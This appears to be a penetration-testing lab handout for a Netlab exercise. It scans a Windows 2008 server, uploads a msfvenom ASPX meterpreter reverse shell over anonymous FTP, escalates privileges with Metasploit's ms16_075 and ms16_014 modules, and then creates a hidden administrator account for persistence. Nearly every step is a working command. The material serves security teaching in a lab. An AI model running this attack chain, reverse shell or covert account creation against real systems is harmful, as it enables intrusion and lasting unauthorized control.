|
1. Perform a port scan against the Windows 2008
|
|
In this part, you use Nmap
-sV option. This option detects the version of the service running behind the open port. The scan will take a bit longer than the command without this parameter.
You can compare the durations and the outputs of the two commands below.
nmap 192.168.2.11 -n
nmap 192.168.2.11 -n -sV
|
|
2. Check FTP server for anonymous login
|
|
Command
|
Notes
|
|
nmap 192.168.2.11 -n --script ftp-anon -p 21
|
You performed this in Lab-5, Section-6, against another server (Metasploitable).
|
|
3. Check the configurations of FTP and HTTP services
|
|
Open the Firefox browser and check the web page served by Windows 2008 by entering the server's IP to the browser.
Connect to the FTP server by using the Anonymous user. Check the files once you logged in by
dir command. (Nmap script in Step-2 showed the same files and folders)
Did you realize that Web and FTP services are using the same home folder?
Think about this scenario: What if you can upload a shell file using the FTP service, and call that file from the Web application.
|
|
4. Create an ASPX reverse shell on Kali Linux
|
|
You will use msfvenom to create an ASPX reverse shell. Server operating systems usually have 64-bit architecture so that you will be making a 64-bit payload for the exploitation.
|
|
Commands
|
Notes
|
|
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.10 lport=443 -f aspx > reverseshell.aspx
|
reverseshell.aspx will be created.
|
|
5. Upload the ASPX file to the Windows 2008
|
|
Upload the file to the Windows 2008 server by using the FTP service
|
|
6. Prepare a handler on Kali Linux
|
|
An ASPX reverse shell on its own does not allow you to connect to the remote server (Windows 2008). There should be a corresponding handler that will respond to the ASPX reverse shell's connection request and send commands to the reverse shell. A handler can be regarded as a command and control server. The reverse shell is like the RC car, but it is only the car. The handler is the remote-control unit. Neither of them will work alone. In this analogy, the RC unit's frequency should be compatible with the frequency of the receiver in the car. Similarly, the parameter of the handler you are creating should be in full harmony with the parameters of the ASPX shell.
|
|
msfconsole
|
This command opens the Metasploit Framework.
|
|
use exploit/multi/handler
|
Use a multi/handler, which is a stub that handles exploits launched outside of the framework. (In this case, it was the reverseshell.aspx file)
|
|
setg payload windows/x64/meterpreter/reverse_tcp
|
Use reverse_tcp payload for this handler. Note that you used
set command in Project-1; however, you are using
setg in this project. setg is used to set options
globally. This option and the following options can be used by any module loaded later on.
|
|
setg lhost 192.168.2.10
|
Set global local host as 192.168.2.10
|
|
setg lport 443
|
Set global local port as 443
|
|
exploit or
run
|
Both commands will do the same thing and run the multi/handler
|
|
7. Call the ASPX reverse shell by using Firefox browser (
ASPX will run on the web application and communicate with the handler on Kali Linux). Check that the ASPX reverse shell connects to the handler and check you get a shell from Window 2008
|
|
Commands/Actions
|
Notes
|
|
Call the reverse shell file you uploaded by using the Firefox browser on Kali Linux
|
You did a similar thing in Project-1.
|
|
Check the “meterpreter session opened” message appeared on the handler window after you called the reverse shell
|
-
|
|
Shell
|
Type this to get the shell from Windows 2008. After typing "shell", you will see the command prompt of the Windows 2008 server.
|
|
whoami
|
It should be “iis apppool\asp.net v4.0 user”
This is not a regular user account; instead this is a service account associated with the web service
Take a screenshot of the user account.
Let’s try to do some actions that require privileged access.
|
|
8. Confirm that shell is a low-privileged shell
|
|
Commands
|
Notes
|
|
net user ms_service mypass123 /add
|
Try to add a user named ms_service (login name)
|
|
cd ..
|
Go to system32 directory
|
|
cd config
|
Try to enter the config directory where critical files are stored.
|
|
dir
|
See the files in the system32 folder.
|
|
del wmi.dll
|
Try to delete a file under system32
|
|
This is an unprivileged shell. It is something like a “read-only” shell.
|
|
exit
|
Exit from the command prompt of Windows 2008.
Important note: This may kill the low-privilege shell on Metasploit, resulting in this message:
“192.168.2.11 – Meterpreter session # closed. Reason: Died”
In this case, you will see
msf5 exploit(multi/handler) > prompt instead of
meterpreter > prompt.
If this is the case, please proceed with the following two steps.
If this is
NOT the case, then go directly to the
Step-9.
|
|
exploit or
run
|
Run the multi/handler again.
|
|
Call the reverse shell (reverseshell.aspx) you uploaded by using the Firefox browser
|
So that you will be able to reopen the shell
|
|
9. Try to escalate privilege
|
|
Commands
|
Notes
|
|
background
|
Send the existing shell to the background.
Important: Make a note of the shell’s session ID
|
|
search suggester
|
This is an informational search command. Search the privilege escalation module in Metasploit
|
|
use post/multi/recon/local_exploit_suggester
|
You will use this local exploit suggester
|
|
show options
|
See the options of the suggester module. It takes the Session ID as a parameter.
|
|
set session #
|
You should replace the # symbol with the session ID number of the shell you sent to the background at the beginning of Step-9.
|
|
exploit or
run
|
Run the local_exploit_suggester module to find local exploits. This command will take a little time to show the results (10 secs).
At this time, the local_exploit_suggester module will use the shell you sent to the background and try to find exploitable local vulnerabilities. The low privilege level on the shell will be sufficient to find exploitable local vulnerabilities.
|
|
use exploit/windows/local/ms16_075_reflection
|
You are lucky that the suggester module suggests many exploits. You will try them until you get a high-privileged shell.
Select ms16_075_reflection exploit first to try privilege escalation
|
|
show options
|
After this command, you will see the global options you set in Step-6 (ms16_075 will use the values set for lhost and lport during exploitation)
|
|
set session 1
|
This is the session you sent to the background.
|
|
Run
|
Run the selected exploit.
Metasploit will try to exploit Windows 2008 to gain a high-privileged shell remotely. Metasploit will use the privileges of the
“iis apppool\asp.net v4.0 user” user.
You should get the message below:
Meterpreter session # opened
192.168.2.10:443 -> 192.168.2.11:some_port
Congrats! You get a shell!
Note that Session # will be one more than the session number you sent to the background.
|
|
shell
|
Get the shell from Windows 2008. You will see the command prompt of the Windows 2008 server.
|
|
whoami
|
Sigh. This is still an unprivileged shell!
|
|
exit
|
Exit from the command prompt of Windows 2008.
|
|
10. Escalate privilege
|
|
background
|
Notice that now the session created by ms16_07_reflection exploit is in the background. There are two unprivileged sessions in the background.
|
|
use exploit/windows/local/ms16_014_wmi_recv_notif
|
Select another exploit module to try the privilege escalation. (When you go up in the terminal window, you will see this is one of the exploits among the list of local_exploit_suggester output)
|
|
show options
|
Just check the lhost and lport parameters
|
|
set session #
|
Which session number should be here? The session number of the session you sent to the background earlier or later?
The answer is Earlier.
Because you are using the exploits suggested for the earlier session by the local_exploit_suggester.
|
|
Run
|
Run the selected exploit.
Metasploit will try to exploit Windows 2008 to gain a high-privileged shell remotely. Metasploit will use the privileges of the
“iis apppool\asp.net v4.0 user” user.
You should get the message below:
Meterpreter session # opened
192.168.2.10:443 -> 192.168.2.11:some_port
You get a shell once again!
Note that you will see a new session number here.
|
|
shell
|
Get the command prompt of Windows 2008 to the Metasploit window.
|
|
whoami
|
Congrats! You have the highest possible privilege that one can have in a Windows operating system.
Take a screenshot of the terminal window.
|
|
11. Create an Administrator account on Windows 2008
|
|
Commands/Actions
|
Notes
|
|
net user ms_service mypass123 /add
|
Now, you will do things to maintain access (persistence). Even if the system admin patches the computer, you will have an administrator account.
You will create a user name named ms_service. This name is selected on purpose, not to attract attention.
|
|
net localgroup administrators ms_service /add
|
Add this user to the Administrators group
|
|
Switch to Windows 2008
|
Switch to Windows 2008 on Netlab
|
|
Log in with administrator / aA12345
|
|
|
Click on the Start icon > Administrative Tools > Computer Management > Local Users and Groups > User
|
You will see the ms_service account here
|
|
Click on the Start icon > Logoff
|
See the ms_service on the login screen.
Take a screenshot of the Windows 2008 logon screen.
You can log in to the ms_service account if you want.
|
jimpop1998
Project2.docx
